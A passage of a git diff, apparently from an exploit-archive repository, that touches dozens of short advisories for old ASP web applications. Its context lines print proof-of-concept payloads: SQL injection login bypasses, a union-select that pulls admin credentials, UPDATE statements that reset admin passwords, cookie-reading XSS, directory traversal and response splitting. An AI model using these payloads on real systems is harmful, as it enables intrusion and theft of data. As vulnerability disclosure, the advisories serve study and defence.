42ced92e0..05cb6d483 --- a/platforms/asp/webapps/25705.txt +++ b/platforms/asp/webapps/25705.txt @@ -5,4 +5,4 @@ FunkyASP AD Systems is prone to an SQL injection vulnerability. This issue is du Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. Supplying admin for the Username and ' or ''=' for the -Password of login.asp is sufficient to authenticate to the administrator account. \ No newline at end of file +Password of login.asp is sufficient to authenticate to the administrator account. \ No newline at end of file diff --git a/platforms/asp/webapps/25751.txt b/platforms/asp/webapps/25751.txt old mode 100755 new mode 100644 index c43372bfa..ea604587c --- a/platforms/asp/webapps/25751.txt +++ b/platforms/asp/webapps/25751.txt @@ -9,4 +9,4 @@ Successful exploitation could result in a compromise of the application, disclos All versions are considered to be vulnerable at the moment. The following proof of concept is available: -Password= ' or ''=' \ No newline at end of file +Password= ' or ''=' \ No newline at end of file diff --git a/platforms/asp/webapps/25753.txt b/platforms/asp/webapps/25753.txt old mode 100755 new mode 100644 index 4398d8e25..abcd2c41b --- a/platforms/asp/webapps/25753.txt +++ b/platforms/asp/webapps/25753.txt @@ -4,4 +4,4 @@ Hosting Controller is reported prone to multiple vulnerabilities. These issues c These issues reportedly affect Hosting Controller 6.1 HotFix 2.0 and prior versions. -http://www.example.com/admin/hosting/resellerresources.asp?action=2&jresourceid=1%20or%201=1 \ No newline at end of file +http://www.example.com/admin/hosting/resellerresources.asp?action=2&jresourceid=1%20or%201=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25754.txt b/platforms/asp/webapps/25754.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25758.txt b/platforms/asp/webapps/25758.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25780.txt b/platforms/asp/webapps/25780.txt old mode 100755 new mode 100644 index dc80af786..cb409c0ac --- a/platforms/asp/webapps/25780.txt +++ b/platforms/asp/webapps/25780.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Supplying the following is sufficient to gain access to the admin control panel: Username =admin -Password= ' or ''=' \ No newline at end of file +Password= ' or ''=' \ No newline at end of file diff --git a/platforms/asp/webapps/25781.txt b/platforms/asp/webapps/25781.txt old mode 100755 new mode 100644 index 2a07f1f33..415d6ce14 --- a/platforms/asp/webapps/25781.txt +++ b/platforms/asp/webapps/25781.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Supplying the following is sufficient to gain access to the admin control panel: username: admin -password: ' or 'a'='a \ No newline at end of file +password: ' or 'a'='a \ No newline at end of file diff --git a/platforms/asp/webapps/25783.txt b/platforms/asp/webapps/25783.txt old mode 100755 new mode 100644 index 12567dab8..32911d3cb --- a/platforms/asp/webapps/25783.txt +++ b/platforms/asp/webapps/25783.txt @@ -8,4 +8,4 @@ livingmailing 1.3 is reported vulnerable. The following proof of concept is available: Username =admin -Password= ' or ''=' \ No newline at end of file +Password= ' or ''=' \ No newline at end of file diff --git a/platforms/asp/webapps/25785.txt b/platforms/asp/webapps/25785.txt old mode 100755 new mode 100644 index a3977b3b3..48090ff9b --- a/platforms/asp/webapps/25785.txt +++ b/platforms/asp/webapps/25785.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/liberum/view.asp?id='[SQL Injection] http://www.example.com/liberum/register.asp?edit='[SQL Injection] -http://www.example.com/liberum/print.asp?id='[SQL Injection] \ No newline at end of file +http://www.example.com/liberum/print.asp?id='[SQL Injection] \ No newline at end of file diff --git a/platforms/asp/webapps/25790.txt b/platforms/asp/webapps/25790.txt old mode 100755 new mode 100644 index d92ec153c..60af32437 --- a/platforms/asp/webapps/25790.txt +++ b/platforms/asp/webapps/25790.txt @@ -8,4 +8,4 @@ WWWeb Concepts Events System 1.0 is reportedly vulnerable. The following proof of concept is available: Uername =admin -Password= ' or ''=' \ No newline at end of file +Password= ' or ''=' \ No newline at end of file diff --git a/platforms/asp/webapps/25795.txt b/platforms/asp/webapps/25795.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25796.txt b/platforms/asp/webapps/25796.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25797.txt b/platforms/asp/webapps/25797.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25798.txt b/platforms/asp/webapps/25798.txt old mode 100755 new mode 100644 index a627fbefe..8544a3463 --- a/platforms/asp/webapps/25798.txt +++ b/platforms/asp/webapps/25798.txt @@ -4,4 +4,4 @@ ProductCart is prone to multiple SQL injection vulnerabilities. These issues are Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/pc/pcadmin/OptionFieldsEdit.asp?idc=1&id=[id]&idccr=[id][sqlInjection] \ No newline at end of file +http://www.example.com/pc/pcadmin/OptionFieldsEdit.asp?idc=1&id=[id]&idccr=[id][sqlInjection] \ No newline at end of file diff --git a/platforms/asp/webapps/25804.txt b/platforms/asp/webapps/25804.txt old mode 100755 new mode 100644 index bf4a6150c..2d36cef70 --- a/platforms/asp/webapps/25804.txt +++ b/platforms/asp/webapps/25804.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos The following proof of concept is available: user: anyuser -pass: 'or''=' \ No newline at end of file +pass: 'or''=' \ No newline at end of file diff --git a/platforms/asp/webapps/25805.txt b/platforms/asp/webapps/25805.txt old mode 100755 new mode 100644 index d3da9864c..2c2320513 --- a/platforms/asp/webapps/25805.txt +++ b/platforms/asp/webapps/25805.txt @@ -4,4 +4,4 @@ Loki Download Manager is prone to an SQL injection vulnerability. This issue is Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm' \ No newline at end of file +http://www.example.com/downmancv/catinfo.asp?cat=' union select null,null,user,null,null,null,null,null,pass,null,null,null,null,null FROM tblAdm' \ No newline at end of file diff --git a/platforms/asp/webapps/25839.txt b/platforms/asp/webapps/25839.txt old mode 100755 new mode 100644 index b1f0cd0c5..68c98ab3c --- a/platforms/asp/webapps/25839.txt +++ b/platforms/asp/webapps/25839.txt @@ -8,4 +8,4 @@ Cool Cafe Chat 1.2.1 is reportedly vulnerable. The following proof of concept is available: user: admin -password: 'or' \ No newline at end of file +password: 'or' \ No newline at end of file diff --git a/platforms/asp/webapps/25843.txt b/platforms/asp/webapps/25843.txt old mode 100755 new mode 100644 index a85001c6f..6bf76a8fc --- a/platforms/asp/webapps/25843.txt +++ b/platforms/asp/webapps/25843.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/UblogReload/index.asp?ci='62&s=category http://www.example.com/UblogReload/index.asp?d=11'&m=6&y=2005&s=day -http://www.example.com/UblogReload/index.asp?m=6'&y=2005&s=month \ No newline at end of file +http://www.example.com/UblogReload/index.asp?m=6'&y=2005&s=month \ No newline at end of file diff --git a/platforms/asp/webapps/25844.txt b/platforms/asp/webapps/25844.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25845.txt b/platforms/asp/webapps/25845.txt old mode 100755 new mode 100644 index f3a01691b..88682930d --- a/platforms/asp/webapps/25845.txt +++ b/platforms/asp/webapps/25845.txt @@ -5,4 +5,4 @@ Ublog Reload is prone to a cross-site scripting vulnerability. This issue is due An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/UblogReload/trackback.asp?bi=[id]&btitle=[XSS]&mode=view -http://www.example.com/UblogReload/trackback.asp?bi=343&btitle=<script>alert('document.cookie')</script>&mode=view \ No newline at end of file +http://www.example.com/UblogReload/trackback.asp?bi=343&btitle=<script>alert('document.cookie')</script>&mode=view \ No newline at end of file diff --git a/platforms/asp/webapps/25847.txt b/platforms/asp/webapps/25847.txt old mode 100755 new mode 100644 index 4d0a0d10f..3f0cf3908 --- a/platforms/asp/webapps/25847.txt +++ b/platforms/asp/webapps/25847.txt @@ -8,4 +8,4 @@ StoreFront Shopping Cart 5.0 is affected by this vulnerability. The following proof of concept example is available: Email id: example@example.com -Password: ' or '=' \ No newline at end of file +Password: ' or '=' \ No newline at end of file diff --git a/platforms/asp/webapps/25853.txt b/platforms/asp/webapps/25853.txt old mode 100755 new mode 100644 index fb7c7a430..5e9c52d28 --- a/platforms/asp/webapps/25853.txt +++ b/platforms/asp/webapps/25853.txt @@ -4,4 +4,4 @@ i-Gallery is prone to a directory traversal vulnerability. This could let remote attackers access files on the computer in the context of the Web server process. -http://www.example.com/gallery/folderview.asp?folder=Sport+Champions/../../../../../../../../winnt/repair \ No newline at end of file +http://www.example.com/gallery/folderview.asp?folder=Sport+Champions/../../../../../../../../winnt/repair \ No newline at end of file diff --git a/platforms/asp/webapps/25855.txt b/platforms/asp/webapps/25855.txt old mode 100755 new mode 100644 index a97e737e2..be11afa1b --- a/platforms/asp/webapps/25855.txt +++ b/platforms/asp/webapps/25855.txt @@ -4,4 +4,4 @@ i-Gallery is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. -http://www.example.com/gallery/folderview.asp?folder=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/gallery/folderview.asp?folder=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/asp/webapps/25858.txt b/platforms/asp/webapps/25858.txt old mode 100755 new mode 100644 index 7b5ca6259..94211da7b --- a/platforms/asp/webapps/25858.txt +++ b/platforms/asp/webapps/25858.txt @@ -13,4 +13,4 @@ http://www.example.com/DUportalPro34/topics/cat.asp?iCat=4[SQL Inject]&iChannel= http://www.example.com/DUportalPro34/Polls/default.asp?iChannel=15[SQL Inject]&nChannel=Polls http://www.example.com/DUportalPro34/home/members.asp?iMem=[SQL Inject] http://www.example.com/DUportalPro34/admin/members_listing_approval.asp?offset=[SQL Inject] -http://www.example.com/DUportalPro34/admin/channels_edit.asp?iChannel=7[SQL inject]&nChannel=[Name Module] \ No newline at end of file +http://www.example.com/DUportalPro34/admin/channels_edit.asp?iChannel=7[SQL inject]&nChannel=[Name Module] \ No newline at end of file diff --git a/platforms/asp/webapps/25863.txt b/platforms/asp/webapps/25863.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25864.txt b/platforms/asp/webapps/25864.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25865.txt b/platforms/asp/webapps/25865.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25866.txt b/platforms/asp/webapps/25866.txt old mode 100755 new mode 100644 index 1ad825454..36f1ff3e4 --- a/platforms/asp/webapps/25866.txt +++ b/platforms/asp/webapps/25866.txt @@ -4,4 +4,4 @@ DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fail A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUpaypalPro/shops/detail.asp?iPro=40[SQL Inject]&iSub= \ No newline at end of file +http://www.example.com/DUpaypalPro/shops/detail.asp?iPro=40[SQL Inject]&iSub= \ No newline at end of file diff --git a/platforms/asp/webapps/25867.txt b/platforms/asp/webapps/25867.txt old mode 100755 new mode 100644 index 0e6cc5472..d64227e37 --- a/platforms/asp/webapps/25867.txt +++ b/platforms/asp/webapps/25867.txt @@ -4,4 +4,4 @@ DUpaypal Pro is prone to multiple SQL-injection vulnerabilities because the fail A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUpaypalPro/shops/sub.asp?iSub=[SQL Inject] \ No newline at end of file +http://www.example.com/DUpaypalPro/shops/sub.asp?iSub=[SQL Inject] \ No newline at end of file diff --git a/platforms/asp/webapps/25868.txt b/platforms/asp/webapps/25868.txt old mode 100755 new mode 100644 index 0898cbe67..fe684a432 --- a/platforms/asp/webapps/25868.txt +++ b/platforms/asp/webapps/25868.txt @@ -4,4 +4,4 @@ DUforum is prone to multiple SQL-injection vulnerabilities because the applicati A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUforum/messages.asp?iMsg=[SQL Inject]248&iFor=6 \ No newline at end of file +http://www.example.com/DUforum/messages.asp?iMsg=[SQL Inject]248&iFor=6 \ No newline at end of file diff --git a/platforms/asp/webapps/25869.txt b/platforms/asp/webapps/25869.txt old mode 100755 new mode 100644 index 756fe914c..3099f7533 --- a/platforms/asp/webapps/25869.txt +++ b/platforms/asp/webapps/25869.txt @@ -4,4 +4,4 @@ DUforum is prone to multiple SQL-injection vulnerabilities because the applicati A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUforum/post.asp?iFor=6[SQL Inject] \ No newline at end of file +http://www.example.com/DUforum/post.asp?iFor=6[SQL Inject] \ No newline at end of file diff --git a/platforms/asp/webapps/25870.txt b/platforms/asp/webapps/25870.txt old mode 100755 new mode 100644 index b901171fd..071a2b653 --- a/platforms/asp/webapps/25870.txt +++ b/platforms/asp/webapps/25870.txt @@ -4,4 +4,4 @@ DUforum is prone to multiple SQL-injection vulnerabilities because the applicati A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUforum/forums.asp?iFor=[SQL Inject] \ No newline at end of file +http://www.example.com/DUforum/forums.asp?iFor=[SQL Inject] \ No newline at end of file diff --git a/platforms/asp/webapps/25871.txt b/platforms/asp/webapps/25871.txt old mode 100755 new mode 100644 index f13d0f58a..98e25b467 --- a/platforms/asp/webapps/25871.txt +++ b/platforms/asp/webapps/25871.txt @@ -4,4 +4,4 @@ DUforum is prone to multiple SQL-injection vulnerabilities because the applicati A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUforum/admin/userEdit.asp?id=[SQL Inject] \ No newline at end of file +http://www.example.com/DUforum/admin/userEdit.asp?id=[SQL Inject] \ No newline at end of file diff --git a/platforms/asp/webapps/25872.txt b/platforms/asp/webapps/25872.txt old mode 100755 new mode 100644 index 06198c2e7..7ea550d1e --- a/platforms/asp/webapps/25872.txt +++ b/platforms/asp/webapps/25872.txt @@ -4,4 +4,4 @@ DUclassmate is prone to multiple SQL-injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUclassmate/default.asp?iState=[SQL Inject]&nState=Florida \ No newline at end of file +http://www.example.com/DUclassmate/default.asp?iState=[SQL Inject]&nState=Florida \ No newline at end of file diff --git a/platforms/asp/webapps/25873.txt b/platforms/asp/webapps/25873.txt old mode 100755 new mode 100644 index 49a8a002d..571004560 --- a/platforms/asp/webapps/25873.txt +++ b/platforms/asp/webapps/25873.txt @@ -4,4 +4,4 @@ DUclassmate is prone to multiple SQL-injection vulnerabilities because the appli A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/DUclassmate/admin/edit.asp?iPro=[SQL Inject] \ No newline at end of file +http://www.example.com/DUclassmate/admin/edit.asp?iPro=[SQL Inject] \ No newline at end of file diff --git a/platforms/asp/webapps/25874.txt b/platforms/asp/webapps/25874.txt old mode 100755 new mode 100644 index 91307f93a..72c005baa --- a/platforms/asp/webapps/25874.txt +++ b/platforms/asp/webapps/25874.txt @@ -9,4 +9,4 @@ Reset the Admin user password with a blank password: - 'UPDATE WebUser SET sPassword=DEFAULT WHERE sUserName='Admin'-- Elevate Guest user privileges to Admin privileges: -- 'UPDATE WebUser SET nUserRightsMask=-1 WHERE sUserName='guest'-- \ No newline at end of file +- 'UPDATE WebUser SET nUserRightsMask=-1 WHERE sUserName='guest'-- \ No newline at end of file diff --git a/platforms/asp/webapps/25905.txt b/platforms/asp/webapps/25905.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25906.txt b/platforms/asp/webapps/25906.txt old mode 100755 new mode 100644 index 502b76fd8..6a9475c2e --- a/platforms/asp/webapps/25906.txt +++ b/platforms/asp/webapps/25906.txt @@ -12,4 +12,4 @@ http://www.example.com/module/account/register/register.asp?Address1=%22%3E%3Csc http://www.example.com/module/account/register/register.asp?Address2=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/module/account/register/register.asp?City=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/module/account/register/register.asp?ZipCode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E -http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/module/account/register/register.asp?Email=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/asp/webapps/25907.txt b/platforms/asp/webapps/25907.txt old mode 100755 new mode 100644 index 714073ebe..bc749c2c9 --- a/platforms/asp/webapps/25907.txt +++ b/platforms/asp/webapps/25907.txt @@ -4,4 +4,4 @@ ASPNuke is prone to an HTTP response splitting vulnerability. This issue is due A remote attacker may exploit this vulnerability to influence or misrepresent how Web content is served, cached or interpreted. This could aid in various attacks that attempt to entice client users into a false sense of trust. -http://www.example.com/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue \ No newline at end of file +http://www.example.com/module/support/language/language_select.asp?action=go&LangCode=trivero%0d%0aSet-Cookie%3Asome%3Dvalue \ No newline at end of file diff --git a/platforms/asp/webapps/25908.txt b/platforms/asp/webapps/25908.txt old mode 100755 new mode 100644 index 5f31cf6cb..5df628404 --- a/platforms/asp/webapps/25908.txt +++ b/platforms/asp/webapps/25908.txt @@ -61,4 +61,4 @@ upload<br> </table> </body> <center><b>pOWERED By Team-Evil l8oo8l@gmail.com -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/asp/webapps/25910.txt b/platforms/asp/webapps/25910.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25913.txt b/platforms/asp/webapps/25913.txt old mode 100755 new mode 100644 index 48c62e450..58b11c2d4 --- a/platforms/asp/webapps/25913.txt +++ b/platforms/asp/webapps/25913.txt @@ -4,4 +4,4 @@ Hosting Controller is prone to a cross-site scripting vulnerability. This issue An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/admin/hosting/error.asp?error=Xss vul \ No newline at end of file +http://www.example.com/admin/hosting/error.asp?error=Xss vul \ No newline at end of file diff --git a/platforms/asp/webapps/25914.txt b/platforms/asp/webapps/25914.txt old mode 100755 new mode 100644 index b47f10c40..b20287dec --- a/platforms/asp/webapps/25914.txt +++ b/platforms/asp/webapps/25914.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos Dynamic Biz Website Builder (QuickWeb) 1.0 is reportedly vulnerable. User ID : admin -Password : 'or '=' \ No newline at end of file +Password : 'or '=' \ No newline at end of file diff --git a/platforms/asp/webapps/2592.htm b/platforms/asp/webapps/2592.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/25922.txt b/platforms/asp/webapps/25922.txt old mode 100755 new mode 100644 index 9d869080d..b137079f1 --- a/platforms/asp/webapps/25922.txt +++ b/platforms/asp/webapps/25922.txt @@ -4,4 +4,4 @@ CyberStrong eShop is prone to an SQL-injection vulnerability. As a result, the a Reportedly, the attacker may steal eShop authentication information. Other attacks may be possible, depending on the capabilities of the underlying database and the nature of the affected query. -http://www.example.com/eshop/20Review.asp?ProductCode=' \ No newline at end of file +http://www.example.com/eshop/20Review.asp?ProductCode=' \ No newline at end of file diff --git a/platforms/asp/webapps/25923.txt b/platforms/asp/webapps/25923.txt old mode 100755 new mode 100644 index d3d4616f9..3ff84f6c9 --- a/platforms/asp/webapps/25923.txt +++ b/platforms/asp/webapps/25923.txt @@ -4,4 +4,4 @@ CyberStrong eShop is prone to an SQL injection vulnerability. As a result, the a It is reported that the attacker may steal eShop authentication information. Other attacks may be possible depending on the capabilities of the underlying database and the nature of the affected query. -http://www.example.com/eshop/10expand.asp?ProductCode=' \ No newline at end of file +http://www.example.com/eshop/10expand.asp?ProductCode=' \ No newline at end of file diff --git a/platforms/asp/webapps/25924.txt b/platforms/asp/webapps/25924.txt old mode 100755 new mode 100644 index e10209b7f..d4d6f9d84 --- a/platforms/asp/webapps/25924.txt +++ b/platforms/asp/webapps/25924.txt @@ -6,4 +6,4 @@ This could allow a remote attacker to read files outside the Web root. This coul All versions of FSboard are vulnerable to this issue at the moment. -http://www.example.com/forum/default.asp?db=general&mode=download&idx=507&fileNum=1&filename=../conf.asp&nav=viewcontents&srhctgr=&srhstr=&page=1 \ No newline at end of file +http://www.example.com/forum/default.asp?db=general&mode=download&idx=507&fileNum=1&filename=../conf.asp&nav=viewcontents&srhctgr=&srhstr=&page=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25925.txt b/platforms/asp/webapps/25925.txt old mode 100755 new mode 100644 index e22b30e72..5528d9c96 --- a/platforms/asp/webapps/25925.txt +++ b/platforms/asp/webapps/25925.txt @@ -4,4 +4,4 @@ CyberStrong eShop is prone to an SQL injection vulnerability. As a result, the a It is reported that the attacker may steal eShop authentication information. Other attacks may be possible depending on the capabilities of the underlying database and the nature of the affected query. -http://www.example.com/eshop/10browse.asp?ProductCode=' \ No newline at end of file +http://www.example.com/eshop/10browse.asp?ProductCode=' \ No newline at end of file diff --git a/platforms/asp/webapps/25953.txt b/platforms/asp/webapps/25953.txt old mode 100755 new mode 100644 index 90a31f177..b4bf9ed1c --- a/platforms/asp/webapps/25953.txt +++ b/platforms/asp/webapps/25953.txt @@ -5,4 +5,4 @@ Comersus Cart is prone to multiple SQL injection vulnerabilities. These issues a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/comersus6/store/comersus_optAffiliateRegistrationExec.asp?name=1&email='&Submit=Join%20now%21 -http://www.example.com/comersus6/store/comersus_optReviewReadExec.asp?idProduct='&description= \ No newline at end of file +http://www.example.com/comersus6/store/comersus_optReviewReadExec.asp?idProduct='&description= \ No newline at end of file diff --git a/platforms/asp/webapps/25956.txt b/platforms/asp/webapps/25956.txt old mode 100755 new mode 100644 index b9e18ae78..cbeae18e1 --- a/platforms/asp/webapps/25956.txt +++ b/platforms/asp/webapps/25956.txt @@ -5,4 +5,4 @@ Comersus Cart is prone to multiple cross-site scripting vulnerabilities. These i An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/backofficetest/backOfficePlus/comersus_backoffice_listAssignedPricesToCustomer.asp?idCustomer=7&name=><script>alert(document.cookie);</script> -http://www.example.com/backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=><script>alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/backofficetest/backOfficePlus/comersus_backoffice_message.asp?message=><script>alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/asp/webapps/25963.txt b/platforms/asp/webapps/25963.txt old mode 100755 new mode 100644 index c1faf9d17..1997dabca --- a/platforms/asp/webapps/25963.txt +++ b/platforms/asp/webapps/25963.txt @@ -12,4 +12,4 @@ http://www.example.com/demo/ratings.asp??PID=' http://www.example.com/demo/dc_forum_Postslist.asp?start=' http://www.example.com/demo/dc_forum_Postslist.asp?key_m=' http://www.example.com/demo/dc_forum_Postslist.asp?psearch=1&Submit=Search%20%28%2A%29&psearchtype=' -http://www.example.com/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1 \ No newline at end of file +http://www.example.com/demo/dc_forum_Postslist.asp?psearch='&Submit=Search%20%28%2A%29&psearchtype=1 \ No newline at end of file diff --git a/platforms/asp/webapps/25965.txt b/platforms/asp/webapps/25965.txt old mode 100755 new mode 100644 index fab1ef72e..42f790c3e --- a/platforms/asp/webapps/25965.txt +++ b/platforms/asp/webapps/25965.txt @@ -4,4 +4,4 @@ Dvbbs is prone to a cross-site scripting vulnerability. This issue is due to a f An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/showerr.asp?BoardID=0&ErrCodes=54&action=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file +http://www.example.com/showerr.asp?BoardID=0&ErrCodes=54&action=<script>JavaScript:alert(document.cookie);</script> \ No newline at end of file diff --git a/platforms/asp/webapps/25981.txt b/platforms/asp/webapps/25981.txt old mode 100755 new mode 100644 index 1d029fb77..97eb31ffd --- a/platforms/asp/webapps/25981.txt +++ b/platforms/asp/webapps/25981.txt @@ -6,4 +6,4 @@ This issue allows a remote attacker to manipulate query structure and logic. It One may input this string into the search box on the affected pages: -'or'1'='1'or'1'='1 \ No newline at end of file +'or'1'='1'or'1'='1 \ No newline at end of file diff --git a/platforms/asp/webapps/26033.txt b/platforms/asp/webapps/26033.txt old mode 100755 new mode 100644 index 9c1e2e215..bf5dd1bac --- a/platforms/asp/webapps/26033.txt +++ b/platforms/asp/webapps/26033.txt @@ -4,4 +4,4 @@ CartWIZ is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/store/viewCart.asp?message=%3Cplaintext%3E \ No newline at end of file +http://www.example.com/store/viewCart.asp?message=%3Cplaintext%3E \ No newline at end of file diff --git a/platforms/asp/webapps/26069.txt b/platforms/asp/webapps/26069.txt old mode 100755 new mode 100644 index 5b57957e0..a34c8a805 --- a/platforms/asp/webapps/26069.txt +++ b/platforms/asp/webapps/26069.txt @@ -6,4 +6,4 @@ This issue is due to a failure in the application to properly sanitize user-supp An attacker can exploit this vulnerability to inject html and script code into the Web browser of an unsuspecting victim.The attacker may then steal cookie-based authentication credentials. Other attacks are also possible. -http://www.example.com/site/message.asp?message=[script]alert(document.cookie);[/script] \ No newline at end of file +http://www.example.com/site/message.asp?message=[script]alert(document.cookie);[/script] \ No newline at end of file diff --git a/platforms/asp/webapps/26070.txt b/platforms/asp/webapps/26070.txt old mode 100755 new mode 100644 index 92583c72b..8de0fb882 --- a/platforms/asp/webapps/26070.txt +++ b/platforms/asp/webapps/26070.txt @@ -7,4 +7,4 @@ Successful exploitation results in gaining full administrative access within the A proof of concept is available: User ID : admin -Password : 'or '=' \ No newline at end of file +Password : 'or '=' \ No newline at end of file diff --git a/platforms/asp/webapps/26107.txt b/platforms/asp/webapps/26107.txt old mode 100755 new mode 100644 index 76bc29b8b..4d41dff3f --- a/platforms/asp/webapps/26107.txt +++ b/platforms/asp/webapps/26107.txt @@ -4,4 +4,4 @@ DVBBS is prone to multiple cross-site scripting vulnerabilities because the appl An attacker may leverage these issues to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE] \ No newline at end of file +http://www.example.com/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE] \ No newline at end of file diff --git a/platforms/asp/webapps/26108.txt b/platforms/asp/webapps/26108.txt old mode 100755 new mode 100644 index 2c7d14496..d5ea76e3a --- a/platforms/asp/webapps/26108.txt +++ b/platforms/asp/webapps/26108.txt @@ -4,4 +4,4 @@ DVBBS is prone to multiple cross-site scripting vulnerabilities because the appl An attacker may leverage these issues to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/dispuser.asp?name=Walltrapass[XSS-CODE] \ No newline at end of file +http://www.example.com/dispuser.asp?name=Walltrapass[XSS-CODE] \ No newline at end of file diff --git a/platforms/asp/webapps/26109.txt b/platforms/asp/webapps/26109.txt old mode 100755 new mode 100644 index f5a4087e4..00895d8f0 --- a/platforms/asp/webapps/26109.txt +++ b/platforms/asp/webapps/26109.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary code in the browser o http://www.example.com/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE] http://www.example.com/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3 http://www.example.com/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE] -http://www.example.com/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title= \ No newline at end of file +http://www.example.com/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title= \ No newline at end of file diff --git a/platforms/asp/webapps/26154.txt b/platforms/asp/webapps/26154.txt old mode 100755 new mode 100644 index 076f6e346..d28dc7a3f --- a/platforms/asp/webapps/26154.txt +++ b/platforms/asp/webapps/26154.txt @@ -4,4 +4,4 @@ PersianBlog is prone to an SQL injection vulnerability. This issue is due to a f Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/userslist.asp?page=2'&catid=16 \ No newline at end of file +http://www.example.com/userslist.asp?page=2'&catid=16 \ No newline at end of file diff --git a/platforms/asp/webapps/26156.txt b/platforms/asp/webapps/26156.txt old mode 100755 new mode 100644 index eeb2e1d95..47d0619e5 --- a/platforms/asp/webapps/26156.txt +++ b/platforms/asp/webapps/26156.txt @@ -6,4 +6,4 @@ Successful exploitation of this vulnerability could lead to a compromise of the calculator.asp?cpaint_function=addNumbers&cpaint_argument[]=1&cpaint_argument[]=2")%20%26%20eval("malicious code 